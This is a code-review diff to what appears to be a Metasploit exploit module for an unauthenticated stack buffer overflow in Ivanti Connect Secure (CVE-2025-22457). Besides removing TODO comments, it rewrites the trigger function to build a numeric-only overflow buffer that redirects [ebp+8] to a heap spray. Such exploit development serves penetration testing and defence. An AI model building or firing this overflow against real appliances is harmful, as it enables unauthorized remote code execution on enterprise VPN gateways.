Fix from code review #2

Author: cdelafuente-r7

modules/exploits/linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457.rb

@@ -23,7 +23,6 @@ def initialize(info = {})
       update_info(
         info,
         'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution via Stack-based Buffer Overflow',
-        # TODO
         'Description' => %q{
           This module exploits a Stack-based Buffer Overflow vulnerability in
           Ivanti Connect Secure to achieve remote code execution
@@ -94,7 +93,6 @@ def validate_options
     if datastore['WEB_CHILDREN'] < 1
       fail_with(Failure::BadConfig, "WEB_CHILDREN should be at least 1 (current value: #{datastore['WEB_CHILDREN']})")
     end
-    # TODO
   end
 
   # https://github.com/BishopFox/CVE-2025-0282-check/blob/main/scan-cve-2025-0282.py#L6
@@ -314,16 +312,10 @@ def spray(libdsplibs_base)
   def trigger
     print_status('Triggering...')
 
-    buffer = '1' * @target[:overflow_length]
-
-    buffer += [
-      0x31313131,
-      0x32323232,
-      0x33333333,
-      0x34343434,
-      0x35353535,
-      0x39393830 # [ebp+8] and it will now point to our spray pattern
-    ].pack('V*')
+    # Build the buffer with only numerical values
+    buffer = rand_text_numeric(@target[:overflow_length])
+    buffer += rand_text_numeric(4 * 5) # add 5 more DWORD's
+    buffer += [0x39393830].pack('V') # [ebp+8] and it will now point to our spray pattern
 
     fail_with(Failure::BadConfig, 'bad chars in buffer, only 0123456789. allowed') unless buffer.scan(/^[\d.]+$/).any?